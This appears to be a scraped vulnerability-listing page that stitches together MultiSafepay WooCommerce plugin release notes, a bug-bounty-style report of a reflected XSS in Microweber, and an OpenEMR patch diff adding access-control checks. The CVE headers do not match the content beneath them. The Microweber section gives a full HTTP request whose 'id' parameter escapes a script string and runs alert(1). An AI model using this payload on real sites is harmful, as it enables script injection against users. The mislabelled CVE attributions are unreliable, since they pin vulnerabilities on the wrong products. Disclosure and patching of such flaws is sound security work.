**Release Notes – WooCommerce 4.1.4 (Feb 23th, 2021)****Fixed**

*   PLGWOOS-563: Remove some nonce validations to support custom checkouts forms (#249)
*   PLGWOOS-550: Typecast cart item quantity to int to avoid errors in the PHP-SDK (#248)

**Changed**

*   PLGWOOS-556: Change composer dependencies to avoid conflicts with other plugins (#247)
*   PLGWOOS-562: Add fallback for in3, in case no fields is filled in checkout, convert the transaction to redirect type (#250)

**Release Notes – WooCommerce 4.1.3 (Feb 21th, 2021)****Fixed**

*   PLGWOOS-549: Support custom order numbers generated by third party plugins in notification method
*   PLGWOOS-551: Resize logo if theme used by merchant do not support WooCommerce

**Release Notes – WooCommerce 4.1.2 (Feb 19th, 2021)****Fixed**

*   PLGWOOS-548: Fix iDEAL gateway if no issuer selected in checkout

**Release Notes – WooCommerce 4.1.1 (Feb 18th, 2021)****Changed**

*   PLGWOOS-545: Remove API Key validation

**Release Notes – WooCommerce 4.1.0 (Feb 17th, 2021)****Added**

*   PLGWOOS-512: Add support for tokenization.
*   PLGWOOS-521: Change order status on callback even if merchant did not save the settings, using defaults.
*   PLGWOOS-530: Process notification, even when the payment method returned by MultiSafepay is not registered as WooCommerce gateway.
*   PLGWOOS-531: Avoid process refund if amount submited in backend is 0

**Fixed**

*   PLGWOOS-535: Fix bug min\_amount filter
*   PLGWOOS-536: Fix instructions in multi select country field
*   PLGWOOS-518: Fix protocol of notification URL
*   PLGWOOS-526: Fix typo error in AfterPay payment method title
*   PLGWOOS-523: Fix type of transaction to redirect for Dotpay payment method

**Changed**

*   PLGWOOS-519: Improvement for coupons support in ShoppingCart.
*   PLGWOOS-528: Refactor gender and salutation fields to process different validation messages
*   PLGWOOS-503: Move debug mode field to options section

**Removed**

*   PLGWOOS-525: Remove validation in backend for MultiSafepay payment method
*   PLGWOOS-516: Avoid initialize the plugin if WooCommerce is not active

**Release Notes – WooCommerce 4.0.0 (internal release) (Feb 12th, 2021)****Added**

*   Complete rewrite of the plugin
*   Full and partial refunds for non billing suite payment methods
*   Full refunds for billing suite payment methods
*   Set MultiSafepay transactions as shipped when order reach the defined status in settings
*   Set MultiSafepay transaction as invoiced when order reach the defined status in settings
*   Filter payment methods by country
*   Filter payment methods by maximum amount of order
*   Filter payment methods by minimum amount of order
*   Custom initialized status for each payment method
*   Validations in backend settings fields
*   Support for compound taxes

**Changed**

*   PLGWOOS-410: Refactor plugin using the PHP-SDK

**Removed**

*   Remove FastCheckout

CVE-2022-33901: MultiSafepay plugin for WooCommerce

Cross-site Scripting (XSS) - Reflected in GitHub repository microweber/microweber prior to 1.2.21.

**Description**

Hi team, I found XSS at /module/.

**Proof of Concept**

Pop up POC: 

Reflected POC: 

Full request payload:

    POST /demo/module/ HTTP/1.1
    Host: demo.microweber.org
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Content-Length: 183
    Origin: https://demo.microweber.org
    Referer: https://demo.microweber.org/demo/shop
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: cross-site
    Te: trailers
    Connection: close
    
    type=shop%2Fcheckout&template=modal&id=js-ajax-cart');});function%20$(num1){alert(1);return%20String(num1)}$(document).ready(function%20()%20{mw.$('-checkout-process&class=no-settings
    

**Impact**

XSS

**Occurrences**

index.php L80-L92

This function does not filter 'id' parameter in script tag, which allows attackers to escape syntax using apostrophe.

CVE-2022-2470: Cross-site Scripting (XSS) - Reflected in microweber

Data Access from Outside Expected Data Manager Component in GitHub repository openemr/openemr prior to 7.0.0.

@@ -16,6 +16,7 @@

use OpenEMR\\Common\\Acl\\AclMain;

use OpenEMR\\Common\\Crypto\\CryptoGen;

use OpenEMR\\Common\\Csrf\\CsrfUtils;

use OpenEMR\\Common\\Twig\\TwigContainer;

use OpenEMR\\Services\\FacilityService;

use OpenEMR\\Services\\PatientService;

  

@@ -1063,9 +1064,17 @@ public function list\_action($patient\_id = "")

$cur\_pid = isset($\_GET\['patient\_id'\]) ? filter\_input(INPUT\_GET, 'patient\_id') : '';

$used\_msg = xl('Current patient unavailable here. Use Patient Documents');

if ($cur\_pid == '00') {

if (!AclMain::aclCheckCore('patients', 'docs', '', \['write', 'addonly'\])) {

echo (new TwigContainer(null, $GLOBALS\['kernel'\]))->getTwig()->render('core/unauthorized.html.twig', \['pageTitle' => xl("Documents")\]);

exit;

}

$cur\_pid = '0';

$is\_new = 1;

}

if (!AclMain::aclCheckCore('patients', 'docs')) {

echo (new TwigContainer(null, $GLOBALS\['kernel'\]))->getTwig()->render('core/unauthorized.html.twig', \['pageTitle' => xl("Documents")\]);

exit;

}

$this\->assign('is\_new', $is\_new);

$this\->assign('place\_hld', $place\_hld);

$this\->assign('cur\_pid', $cur\_pid);

@@ -1,5 +1,8 @@

<?php

  

use OpenEMR\\Common\\Acl\\AclMain;

use OpenEMR\\Common\\Twig\\TwigContainer;

  

class C\_PracticeSettings extends Controller

{

var $template\_mod;

@@ -14,6 +17,11 @@ function \_\_construct($template\_mod = "general")

$this\->assign("TOP\_ACTION", $GLOBALS\['webroot'\] . "/controller.php?" . "practice\_settings" . "&");

$this\->assign("STYLE", $GLOBALS\['style'\]);

$this\->direction = ($GLOBALS\['\_SESSION'\]\['language\_direction'\] == 'rtl') ? 'right' : 'left';

  

if (!AclMain::aclCheckCore('admin', 'practice')) {

echo (new TwigContainer(null, $GLOBALS\['kernel'\]))->getTwig()->render('core/unauthorized.html.twig', \['pageTitle' => xl("Practice Settings")\]);

exit;

}

}

  

function default\_action($display = "")

@@ -27,8 +27,15 @@

require\_once("$srcdir/options.inc.php");

require\_once("$srcdir/payment.inc.php");

  

use OpenEMR\\Common\\Acl\\AclMain;

use OpenEMR\\Common\\Twig\\TwigContainer;

use OpenEMR\\Core\\Header;

  

if (!AclMain::aclCheckCore('acct', 'bill', '', 'write') && !AclMain::aclCheckCore('acct', 'eob', '', 'write')) {

echo (new TwigContainer(null, $GLOBALS\['kernel'\]))->getTwig()->render('core/unauthorized.html.twig', \['pageTitle' => xl("Confirm Payment")\]);

exit;

}

  

$screen = 'edit\_payment';

  

// Deletion of payment distribution code

@@ -23,10 +23,17 @@

  

use OpenEMR\\Billing\\ParseERA;

use OpenEMR\\Billing\\SLEOB;

use OpenEMR\\Common\\Acl\\AclMain;

use OpenEMR\\Common\\Csrf\\CsrfUtils;

use OpenEMR\\Common\\Twig\\TwigContainer;

use OpenEMR\\Core\\Header;

use OpenEMR\\OeUI\\OemrUI;

  

if (!AclMain::aclCheckCore('acct', 'bill', '', 'write') && !AclMain::aclCheckCore('acct', 'eob', '', 'write')) {

echo (new TwigContainer(null, $GLOBALS\['kernel'\]))->getTwig()->render('core/unauthorized.html.twig', \['pageTitle' => xl("ERA Posting")\]);

exit;

}

  

$hidden\_type\_code = isset($\_POST\['hidden\_type\_code'\]) ? $\_POST\['hidden\_type\_code'\] : '';

$check\_date = isset($\_POST\['check\_date'\]) ? $\_POST\['check\_date'\] : '';

$post\_to\_date = isset($\_POST\['post\_to\_date'\]) ? $\_POST\['post\_to\_date'\] : '';

@@ -17,9 +17,16 @@

require\_once("../globals.php");

require\_once("$srcdir/patient.inc");

  

use OpenEMR\\Common\\Acl\\AclMain;

use OpenEMR\\Common\\Csrf\\CsrfUtils;

use OpenEMR\\Common\\Twig\\TwigContainer;

use OpenEMR\\Core\\Header;

  

if (!AclMain::aclCheckCore('acct', 'rep\_a')) {

echo (new TwigContainer(null, $GLOBALS\['kernel'\]))->getTwig()->render('core/unauthorized.html.twig', \['pageTitle' => xl("Indigent Patients Report")\]);

exit;

}

  

$alertmsg = '';

  

function bucks($amount)

@@ -25,9 +25,16 @@

require\_once("$srcdir/payment.inc.php");

  

use OpenEMR\\Billing\\ParseERA;

use OpenEMR\\Common\\Acl\\AclMain;

use OpenEMR\\Common\\Twig\\TwigContainer;

use OpenEMR\\Core\\Header;

use OpenEMR\\OeUI\\OemrUI;

  

if (!AclMain::aclCheckCore('acct', 'bill', '', 'write') && !AclMain::aclCheckCore('acct', 'eob', '', 'write')) {

echo (new TwigContainer(null, $GLOBALS\['kernel'\]))->getTwig()->render('core/unauthorized.html.twig', \['pageTitle' => xl("New Payment")\]);

exit;

}

  

//===============================================================================

$screen = 'new\_payment';

//===============================================================================

@@ -23,9 +23,16 @@

require\_once("$srcdir/options.inc.php");

require\_once("$srcdir/payment.inc.php");

  

use OpenEMR\\Common\\Acl\\AclMain;

use OpenEMR\\Common\\Twig\\TwigContainer;

use OpenEMR\\Core\\Header;

use OpenEMR\\OeUI\\OemrUI;

  

if (!AclMain::aclCheckCore('acct', 'bill', '', 'write') && !AclMain::aclCheckCore('acct', 'eob', '', 'write')) {

echo (new TwigContainer(null, $GLOBALS\['kernel'\]))->getTwig()->render('core/unauthorized.html.twig', \['pageTitle' => xl("Search Payment")\]);

exit;

}

  

//===============================================================================

//Deletion of payment and its corresponding distributions.

//===============================================================================

@@ -36,10 +36,17 @@

use OpenEMR\\Billing\\InvoiceSummary;

use OpenEMR\\Billing\\ParseERA;

use OpenEMR\\Billing\\SLEOB;

use OpenEMR\\Common\\Acl\\AclMain;

use OpenEMR\\Common\\Csrf\\CsrfUtils;

use OpenEMR\\Common\\Twig\\TwigContainer;

use OpenEMR\\Core\\Header;

use OpenEMR\\OeUI\\OemrUI;

  

if (!AclMain::aclCheckCore('acct', 'eob', '', 'write')) {

echo (new TwigContainer(null, $GLOBALS\['kernel'\]))->getTwig()->render('core/unauthorized.html.twig', \['pageTitle' => xl("EOB Posting - Search")\]);

exit;

}

  

$DEBUG = 0; // set to 0 for production, 1 to test

$alertmsg = '';

$where = '';

@@ -36,8 +36,14 @@

  

use OpenEMR\\Common\\Acl\\AclMain;

use OpenEMR\\Common\\Csrf\\CsrfUtils;

use OpenEMR\\Common\\Twig\\TwigContainer;

use OpenEMR\\Core\\Header;

  

if (!AclMain::aclCheckCore('acct', 'rep') && !AclMain::aclCheckCore('acct', 'rep\_a')) {

echo (new TwigContainer(null, $GLOBALS\['kernel'\]))->getTwig()->render('core/unauthorized.html.twig', \['pageTitle' => xl("Cash Receipts by Provider")\]);

exit;

}

  

function is\_clinic($code)

{

global $bcodes;

@@ -60,11 +66,6 @@ function bucks($amount)

}

}

  

if (! AclMain::aclCheckCore('acct', 'rep')) {

die(xlt("Unauthorized access."));

}

  

  

$form\_use\_edate = $\_POST\['form\_use\_edate'\] ?? null;

  

$form\_proc\_codefull = trim($\_POST\['form\_proc\_codefull'\] ?? '');

@@ -373,6 +374,11 @@ function sel\_diagnosis() {

<?php

if ($\_POST\['form\_refresh'\]) {

$form\_doctor = $\_POST\['form\_doctor'\];

if (!AclMain::aclCheckCore('acct', 'rep\_a')) {

// only allow user to see their encounter information

$form\_doctor = $\_SESSION\['authUserID'\];

}

  

$arows = array();

  

$ids\_to\_skip = array();

@@ -18,8 +18,15 @@

require\_once('../globals.php');

require\_once("$srcdir/patient.inc");

  

use OpenEMR\\Common\\Acl\\AclMain;

use OpenEMR\\Common\\Twig\\TwigContainer;

use OpenEMR\\Core\\Header;

  

if (!AclMain::aclCheckCore('patients', 'lab')) {

echo (new TwigContainer(null, $GLOBALS\['kernel'\]))->getTwig()->render('core/unauthorized.html.twig', \['pageTitle' => xl("Lab Documents")\]);

exit;

}

  

$curdate = date\_create(date("Y-m-d"));

date\_sub($curdate, date\_interval\_create\_from\_date\_string("7 days"));

$sub\_date = date\_format($curdate, 'Y-m-d');

@@ -17,6 +17,7 @@

require\_once("$srcdir/lab.inc");

  

use OpenEMR\\Common\\Acl\\AclMain;

use OpenEMR\\Common\\Twig\\TwigContainer;

use OpenEMR\\Core\\Header;

  

// Indicates if we are entering in batch mode.

@@ -26,15 +27,17 @@

$form\_review = empty($\_GET\['review'\]) ? 0 : 1;

  

// Check authorization.

$thisauth = AclMain::aclCheckCore('patients', 'med');

$thisauth = AclMain::aclCheckCore('patients', 'lab');

if (!$thisauth) {

die(xlt('Not authorized'));

echo (new TwigContainer(null, $GLOBALS\['kernel'\]))->getTwig()->render('core/unauthorized.html.twig', \['pageTitle' => xl("Procedure Results")\]);

exit;

}

  

// Check authorization for pending review.

$reviewauth = AclMain::aclCheckCore('patients', 'sign');

if ($form\_review and !$reviewauth and !$thisauth) {

die(xlt('Not authorized'));

echo (new TwigContainer(null, $GLOBALS\['kernel'\]))->getTwig()->render('core/unauthorized.html.twig', \['pageTitle' => xl("Procedure Results")\]);

exit;

}

  

// Set pid for pending review.

@@ -18,8 +18,14 @@

  

use OpenEMR\\Common\\Acl\\AclMain;

use OpenEMR\\Common\\Csrf\\CsrfUtils;

use OpenEMR\\Common\\Twig\\TwigContainer;

use OpenEMR\\Core\\Header;

  

if (!AclMain::aclCheckCore('patients', 'lab')) {

echo (new TwigContainer(null, $GLOBALS\['kernel'\]))->getTwig()->render('core/unauthorized.html.twig', \['pageTitle' => xl("Pending Orders")\]);

exit;

}

  

function thisLineItem($row)

{

$provname = $row\['provider\_lname'\];

@@ -53,10 +59,6 @@ function thisLineItem($row)

} // End not csv export

}

  

if (!AclMain::aclCheckCore('acct', 'rep')) {

die(xlt("Unauthorized access."));

}

  

$form\_from\_date = isset($\_POST\['form\_from\_date'\]) ? DateToYYYYMMDD($\_POST\['form\_from\_date'\]) : date('Y-m-d');

$form\_to\_date = isset($\_POST\['form\_to\_date'\]) ? DateToYYYYMMDD($\_POST\['form\_to\_date'\]) : date('Y-m-d');

$form\_facility = $\_POST\['form\_facility'\] ?? null;

@@ -22,12 +22,12 @@

  

use OpenEMR\\Common\\Acl\\AclMain;

use OpenEMR\\Common\\Csrf\\CsrfUtils;

use OpenEMR\\Common\\Twig\\TwigContainer;

use OpenEMR\\Core\\Header;

  

// Might want something different here.

//

if (! AclMain::aclCheckCore('acct', 'rep')) {

die(xlt("Unauthorized access."));

if (!AclMain::aclCheckCore('patients', 'lab')) {

echo (new TwigContainer(null, $GLOBALS\['kernel'\]))->getTwig()->render('core/unauthorized.html.twig', \['pageTitle' => xl("Procedure Statistics Report")\]);

exit;

}

  

$from\_date = isset($\_POST\['form\_from\_date'\]) ? DateToYYYYMMDD($\_POST\['form\_from\_date'\]) : '0000-00-00';

@@ -15,6 +15,8 @@

  

require\_once("../globals.php");

  

use OpenEMR\\Common\\Acl\\AclMain;

use OpenEMR\\Common\\Twig\\TwigContainer;

use OpenEMR\\Core\\Header;

  

// This script can be run either inside the OpenEMR frameset for order catalog

@@ -26,6 +28,15 @@

$order = isset($\_GET\['order'\]) ? $\_GET\['order'\] + 0 : 0;

$labid = isset($\_GET\['labid'\]) ? $\_GET\['labid'\] + 0 : 0;

  

if (!$popup && !AclMain::aclCheckCore('admin', 'super')) {

echo (new TwigContainer(null, $GLOBALS\['kernel'\]))->getTwig()->render('core/unauthorized.html.twig', \['pageTitle' => xl("Configure Orders and Results")\]);

exit;

}

if ($popup && !AclMain::aclCheckCore('patients', 'lab') && !AclMain::aclCheckCore('admin', 'super')) {

echo (new TwigContainer(null, $GLOBALS\['kernel'\]))->getTwig()->render('core/unauthorized.html.twig', \['pageTitle' => xl("Configure Orders and Results")\]);

exit;

}

  

// If Save was clicked, set the result, close the window and exit.

//

if ($popup && $\_POST\['form\_save'\]) {

@@ -17,8 +17,15 @@

  

require\_once(dirname(\_\_FILE\_\_) . "../../globals.php");

  

use OpenEMR\\Common\\Acl\\AclMain;

use OpenEMR\\Common\\Twig\\TwigContainer;

use OpenEMR\\Core\\Header;

  

if (!AclMain::aclCheckCore('patients', 'med', '', 'write')) {

echo (new TwigContainer(null, $GLOBALS\['kernel'\]))->getTwig()->render('core/unauthorized.html.twig', \['pageTitle' => xl("Import")\]);

exit;

}

  

?>

<html\>

<head\>

@@ -18,9 +18,16 @@

require\_once(dirname(\_\_FILE\_\_) . "/../../library/patient.inc");

require\_once(dirname(\_\_FILE\_\_) . "/../../library/parse\_patient\_xml.php");

  

use OpenEMR\\Common\\Acl\\AclMain;

use OpenEMR\\Common\\Csrf\\CsrfUtils;

use OpenEMR\\Common\\Twig\\TwigContainer;

use OpenEMR\\Core\\Header;

  

if (!AclMain::aclCheckCore('patients', 'med', '', 'write')) {

echo (new TwigContainer(null, $GLOBALS\['kernel'\]))->getTwig()->render('core/unauthorized.html.twig', \['pageTitle' => xl("CCR Approve")\]);

exit;

}

  

if (isset($\_GET\['approve'\]) && $\_GET\['approve'\] == 1) {

if (!CsrfUtils::verifyCsrfToken($\_GET\["csrf\_token\_form"\])) {

CsrfUtils::csrfNotVerified();

@@ -13,6 +13,11 @@

\*/

  

require\_once("../../globals.php");

require\_once("../../../library/registry.inc");

  

use OpenEMR\\Common\\Acl\\AclMain;

use OpenEMR\\Common\\Twig\\TwigContainer;

  

if (substr($\_GET\["formname"\], 0, 3) === 'LBF') {

// Use the List Based Forms engine for all LBFxxxxx forms.

include\_once("$incdir/forms/LBF/new.php");

@@ -25,6 +30,14 @@

// ensure the path variable has no illegal characters

check\_file\_dir\_name($\_GET\["formname"\]);

  

// ensure authorized to see the form

if (!AclMain::aclCheckForm($\_GET\["formname"\])) {

$formLabel = xl\_form\_title(getRegistryEntryByDirectory($\_GET\["formname"\], 'name')\['name'\] ?? '');

$formLabel = (!empty($formLabel)) ? $formLabel : $\_GET\["formname"\];

echo (new TwigContainer(null, $GLOBALS\['kernel'\]))->getTwig()->render('core/unauthorized.html.twig', \['pageTitle' => $formLabel\]);

exit;

}

  

include\_once("$incdir/forms/" . $\_GET\["formname"\] . "/new.php");

}

  

@@ -23,11 +23,29 @@

use OpenEMR\\Billing\\BillingUtilities;

use OpenEMR\\Common\\Acl\\AclMain;

use OpenEMR\\Common\\Csrf\\CsrfUtils;

use OpenEMR\\Common\\Twig\\TwigContainer;

use OpenEMR\\Core\\Header;

use OpenEMR\\OeUI\\OemrUI;

use OpenEMR\\PaymentProcessing\\Sphere\\SpherePayment;

use OpenEMR\\Services\\FacilityService;

  

if (!empty($\_REQUEST\['receipt'\]) && empty($\_POST\['form\_save'\])) {

if (!AclMain::aclCheckCore('acct', 'bill') && !AclMain::aclCheckCore('acct', 'rep\_a') && !AclMain::aclCheckCore('patients', 'rx')) {

echo (new TwigContainer(null, $GLOBALS\['kernel'\]))->getTwig()->render('core/unauthorized.html.twig', \['pageTitle' => xl("Receipt for Payment")\]);

exit;

}

} else {

if (!AclMain::aclCheckCore('acct', 'bill', '', 'write')) {

if (!empty($\_POST\['form\_save'\])) {

$pageTitle = xl("Receipt for Payment");

} else {

$pageTitle = xl("Record Payment");

}

echo (new TwigContainer(null, $GLOBALS\['kernel'\]))->getTwig()->render('core/unauthorized.html.twig', \['pageTitle' => $pageTitle\]);

exit;

}

}

  

$pid = (!empty($\_REQUEST\['hidden\_patient\_code'\]) && ($\_REQUEST\['hidden\_patient\_code'\] > 0)) ? $\_REQUEST\['hidden\_patient\_code'\] : $pid;

  

$facilityService = new FacilityService();

Tag

#php